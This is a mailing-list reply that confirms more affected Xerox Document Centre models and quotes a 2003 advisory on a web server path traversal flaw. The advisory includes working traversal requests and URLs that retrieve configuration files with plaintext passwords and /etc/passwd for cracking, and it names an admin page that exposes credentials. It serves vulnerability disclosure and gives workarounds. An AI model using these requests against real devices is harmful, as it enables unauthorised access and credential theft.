<<< Date Index >>>     <<< Thread Index >>>

Re: Security bug in Xerox Document Centre



In-Reply-To: <20031219141657.A1147@xxxxxxxxxxxxxxxxxxx>


Just tested this out on a few different models of Xerox multifunction devices 
of ours as well, and all three were vulnerable. Following systems apply:

Document Centre 440DC
Document Centre 480DC
Document Centre 425ST

>TECHNICAL INFO
>===============================================================================
>
>Vulnerable systems
>- --------------------------------------------------------------
>
>    Xerox Document Centre 470, 255ST and maybe others.
>    Software        : Xerox_MicroServer
>    Version         : Xerox11 0.19.5.509
>    OS              : LynxOS:E2.1_SMP.063.1:02/13/2003
>
>
>Impact
>- -----------------------------------------
>
>
>    Remote access to files.
>    Access to plaintext passwords for the http administration interface.
>    Access to DES passwords for the operating system.
>    Read-write access to http users and passwords
>
>
>Details
>- --------------------------------------------------------------
>
>    Web server software (self-reports as "Xerox_MicroServer/Xerox11")
>    for Xerox hardware will return a binary dump of directories when
>    the requested URL ends with "/.." or "/."; so you can build easily
>    the directory/file tree from document root and get every file.
>
>    At first, you can't get back past document root, since httpd seems
>    to reject "../" if it would climb back too much:
>
>
>    GET /../.. -> "The request had invalid syntax."
>
>    But it does accept "../":
>
>    GET /assist/.. -> OK
>
>    So maybe it just counts "../" groups and compares the count
>    to the total number of "/" ? Let's try:
>
>    GET /assist/////.././../../. -> OK
>
>
>
>    Examples:
>
>    - http://xerox_dc_470.example.com/..
>
>
>00    00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43     ...E...........C
>10    00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06     ...........F....
>20    63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06     config.....H....
>30    68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04     htdocs.....&....
>40    6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04     jobs.......)....
>50    6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00     lang............
>60    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
>
>    - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg
>
>    and you get full configuration, including plain text passwords.
>
>    - http://xerox_dc_470.example.com////////../../../../../../etc/passwd
>
>    and you get a passwd file to run crack on
>
>
>    Even without having to use ".." you can get the plain text passwords
>    for the HTTP interface using
>
>    http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml
>
>    From that page, you can even create new users; when you press
>    "Apply new settings" button prompts for admin password (the
>    same you just have read in that same page)
>
>
>    Probably you could use this to steal documents from the printer
>    queue, but I haven't verified this.
>
>
>    Note: to test this vulnerability do not use any "smart" http client
>    which will rewrite the URL internally to suppress '../' parts.
>
>
>
>Workaround
>- ---------------------------------------------------------------------
>
>    - Disable http interface.
>    - Restrict access permissions to trusted hosts
>
>===============================================================================
>
>
>-- 
>finger spd@xxxxxxxxxxxxxxxxxxx for PGP      /
>.mailcap tip of the day:                   /             La vida es una carcel
>application/ms-tnef; cat '%s' > /dev/null /           con las puertas abiertas
>text/x-vcard; cat '%s' > /dev/null       /            (A. Calamaro)
>